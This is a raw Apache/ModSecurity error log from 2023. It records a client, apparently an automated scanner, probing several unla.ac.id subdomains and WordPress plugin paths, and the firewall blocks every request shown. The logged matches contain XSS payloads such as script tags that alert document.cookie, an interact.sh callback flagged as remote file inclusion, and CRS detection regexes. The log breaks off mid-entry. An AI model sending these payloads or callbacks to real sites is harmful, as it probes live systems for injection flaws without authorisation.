[Tue Aug 29 11:53:43.747557 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAApHRVoAAAAP"]
[Tue Aug 29 11:53:43.748103 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAolKY8AAAAe"]
[Tue Aug 29 11:53:43.756353 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAApJDS4AAAAY"]
[Tue Aug 29 11:53:44.561111 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO152MCo-f0AAAoPudQAAAAM"]
[Tue Aug 29 11:53:44.573730 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO152MCo-f0AAAoesQ4AAAAV"]
[Tue Aug 29 11:53:45.532730 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAApHRV0AAAAP"]
[Tue Aug 29 11:53:45.536617 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAoz74sAAAAS"]
[Tue Aug 29 11:53:45.537575 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAo3IgYAAAAa"]
[Tue Aug 29 11:53:45.544722 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAn409MAAAAW"]
[Tue Aug 29 11:53:45.556497 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAApHRV4AAAAP"]
[Tue Aug 29 11:53:45.559166 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAot8TEAAAAn"]
[Tue Aug 29 11:53:45.564798 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAoz74wAAAAS"]
[Tue Aug 29 11:53:45.619084 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAox7JoAAAAN"]
[Tue Aug 29 11:53:45.619812 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAn409QAAAAW"]
[Tue Aug 29 11:53:45.624647 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO152cCo-f0AAAo2m6kAAAAA"]
[Tue Aug 29 11:53:45.675597 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAoqbVgAAAAj"]
[Tue Aug 29 11:53:45.679027 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAoz744AAAAS"]
[Tue Aug 29 11:53:45.683679 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAoGFfAAAAAE"]
[Tue Aug 29 11:53:45.695994 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAoqbVkAAAAj"]
[Tue Aug 29 11:53:45.696351 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAApHRWEAAAAP"]
[Tue Aug 29 11:53:46.552341 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO152sCo-f0AAAoz748AAAAS"]
[Tue Aug 29 11:53:46.746347 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO152sCo-f0AAAolKZYAAAAe"]
[Tue Aug 29 11:53:46.942728 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152sCo-f0AAAoUJdgAAAAB"]
[Tue Aug 29 11:53:46.943120 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152sCo-f0AAAoW7UcAAAAJ"]
[Tue Aug 29 11:53:47.052312 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAoW7UgAAAAJ"]
[Tue Aug 29 11:53:47.062997 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAApLWjUAAAAI"]
[Tue Aug 29 11:53:47.146653 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri 